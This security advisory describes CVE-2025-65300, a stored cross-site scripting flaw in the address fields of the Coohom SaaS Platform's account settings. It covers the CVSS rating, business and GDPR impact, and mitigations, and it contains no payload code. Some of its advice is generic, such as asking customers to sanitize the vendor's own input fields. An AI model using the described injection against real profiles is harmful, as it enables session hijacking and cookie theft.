CVE-2025-65300 is a stored Cross-Site Scripting (XSS) vulnerability identified in the Coohom SaaS Platform, specifically within the Account Settings module. The flaw exists because user input fields for address components—City, State, and Country/Region—do not properly sanitize or encode input before rendering it back to the user's profile page. This allows an attacker with at least limited privileges (PR:L) to inject arbitrary JavaScript code into these fields. When other users view the compromised profile page, the malicious script executes in their browsers, potentially enabling session hijacking, cookie theft, or other arbitrary script execution attacks. The vulnerability requires user interaction (UI:R) to trigger and affects confidentiality and integrity but not availability. The CVSS vector (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) indicates network attack vector, low attack complexity, partial privileges, and user interaction. The scope is changed (S:C), meaning the vulnerability can affect resources beyond the vulnerable component. Although no known exploits are reported in the wild, the vulnerability represents a significant risk, especially in environments where user profiles are frequently accessed by multiple users. The lack of available patches or mitigation details suggests that organizations must implement compensating controls promptly. This vulnerability is categorized under CWE-79, a common and well-understood XSS weakness, emphasizing the need for proper input validation and output encoding in web applications.

For European organizations using the Coohom SaaS Platform, this vulnerability could lead to unauthorized access to user sessions and sensitive data through client-side script execution. Attackers could hijack sessions of users with access to sensitive information or administrative privileges, potentially leading to data leakage or unauthorized actions within the platform. The impact is particularly relevant for companies in architecture, interior design, and real estate sectors that rely on Coohom for project collaboration and client management. Compromise of user accounts could disrupt business operations, damage reputation, and lead to regulatory compliance issues under GDPR due to exposure of personal data. Since the vulnerability requires user interaction and some level of privilege, insider threats or targeted phishing campaigns could increase exploitation likelihood. The medium severity rating suggests moderate risk, but the potential for chained attacks or lateral movement within the platform could amplify consequences. Organizations with extensive use of Coohom across multiple departments or with external collaborators are at higher risk of widespread impact.

European organizations should implement the following specific mitigations: 1) Immediately audit and sanitize all user input fields in the Coohom platform, especially address-related fields, to ensure proper encoding and filtering of special characters. 2) Employ Content Security Policy (CSP) headers to restrict execution of unauthorized scripts in browsers accessing the platform. 3) Enforce strict access controls and limit privileges to reduce the risk of malicious input from low-privilege users. 4) Educate users about the risks of clicking on suspicious links or viewing untrusted profiles to reduce user interaction exploitation. 5) Monitor logs and user activity for unusual profile updates or script injection attempts. 6) Engage with Coohom support or vendor channels to request timely patches or updates addressing this vulnerability. 7) Consider implementing web application firewalls (WAF) with rules to detect and block XSS payloads targeting the platform. 8) Regularly review and update incident response plans to include scenarios involving client-side script attacks. These measures go beyond generic advice by focusing on platform-specific input vectors and user behavior.